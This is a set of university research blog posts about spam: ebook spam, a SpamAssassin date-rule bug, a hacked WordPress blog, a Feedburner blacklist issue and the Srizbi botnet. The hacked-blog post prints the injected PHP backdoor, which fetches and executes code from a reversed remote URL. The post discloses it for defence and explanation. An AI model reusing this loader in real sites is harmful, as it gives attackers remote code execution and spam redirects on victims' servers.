UMBC ebiquity
spam

New frontiers in spam: the Kindle Swindle

April 6th, 2011, by Tim Finin, posted in Machine Learning

Publishing trends has a good post describing a new variation on spam: creating low-quality ebooks from plagiarized or public-domain content and selling them in ebook markets like Amazon’s Kindle store. If you want to MAKE.MONEY.FAST there are people willing to help:

Automatically detecting these spam ebooks might be a good machine learning project. One problem is that to use features of the ebook itself (e.g., poor formatting) might require purchasing it. But there are sure to be many useful features that the ebook store provides that might support an effective classifier.

(h/t Bruce Schneier)

Spamassassin 2010 bug

January 1st, 2010, by Tim Finin, posted in GENERAL

Shades of Y2K! Mike Cardwell reports on a rule in Spamassassin that judges any message sent in or after 2010 as “grossly in the future” and treats this as evidence of it being spam. I just checked and found that our mail server’s Spamassassin is using this buggy FH_DATE_PAST_20XX rule.

If you are using Spamassassin, or think your mail server might be, check the source of mail you have received today. Here’s an example from one of my messages this morning.

X-Spam-Checker-Version: SpamAssassin 3.2.5 ... on mail.cs.umbc.edu
X-Spam-Level: *
X-Spam-Status: No, score=1.6 required=5.0 tests=AWL,FH_DATE_PAST_20XX
  autolearn=disabled version=3.2.5
Received: from mail-yw0-f142.google.com (mail-yw0-f142.google.com
  [209.85.211.142]) by mail.cs.umbc.edu (8.14.3/8.14.3) with ESMTP
  id o01DjJUn011187; Fri, 1 Jan 2010 08:45:19 -0500 (EST)

If the message exceeds the local spam score threshold for, you may find a block with more details in your message header, like this example.

Content analysis details:   (6.1 points, 5.0 required)

 pts rule name              description
---- ---------------------- ----------------------------------
 3.4 FH_DATE_PAST_20XX     The date is grossly in the future.
-4.0 RCVD_IN_DNSWL_MED   RBL: Sender listed at http://www.dnswl.org/,
    medium trust [130.85.25.80 listed in list.dnswl.org]
 1.8 SUBJ_ALL_CAPS  Subject is all capitals
 0.7 MSOE_MID_WRONG_CASE  MSOE_MID_WRONG_CASE
 4.2 FORGED_MUA_OUTLOOK  Forged mail pretending to be from MS Outlook

As a workaround until your server updates Spamassassin, the points that the rule adds to a message’s spam score can be lowered to 0.0 in Spamassassin’s configuration file (local.cf) or your own user-prefs file.

score FH_DATE_PAST_20XX 0.0

Ebiquity Google alert tripwires triggered

May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.


Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Storms on Planet Social Media Research

May 7th, 2009, by Tim Finin, posted in Google, Social media, splog

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.

How the Srizbi botnet escaped destruction to spam again

November 30th, 2008, by Tim Finin, posted in Security

Just like Freddy Kreuger, botnets are hard to kill.

In a series of posts on his Security Fix blog, Brian Krebs provides a good explanation of how the Srizbi botnet was able to come back to life after being killed (we thought!) earlier this month.

“The botnet Srizbi was knocked offline Nov. 11 along with Web-hosting firm McColo, which Internet security experts say hosted machines that controlled the flow of 75 percent of the world’s spam. One security firm, FireEye, thought it had found a way to prevent the botnet from coming back online by registering domain names it thought Srizbi was likely to target. But when that approach became too costly for the firm, they had to abandon their efforts.”

In a example of good distributed programming design, the botnet had a backup plan if its control servers were taken down.

“The malware contained a mathematical algorithm that generates a random but unique Web site domain name that the bots would be instructed to check for new instructions and software updates from its authors. Shortly after McColo was taken offline, researchers at FireEye said they deciphered the instructions that told computers infected with Srizbi which domains to seek out. FireEye researchers thought this presented a unique opportunity: If they could figure out what those rescue domains would be going forward, anyone could register or otherwise set aside those domains to prevent the Srizbi authors from regaining control over their massive herd of infected machines.”

Unfortunately, FireEye did not have the resources to carry out its plan and was forced to abandon it, but not before seeking help from other companies and organizations with deeper pockets.

“A week ago, FireEye researcher Lanstein said they were looking for someone else to register the domain names that the Srizbi bots might try to contact to revive themselves. He said they approached other companies such as VeriSign Inc. and Microsoft Corp. After FireEye abandoned its efforts, some other members of the computer security community said they reached out for help from the United States Computer Emergency Readiness Team, or US-CERT, a partnership between the Department of Homeland Security and the private sector to combat cypersecurity threats.

File this one under opportunity, lost.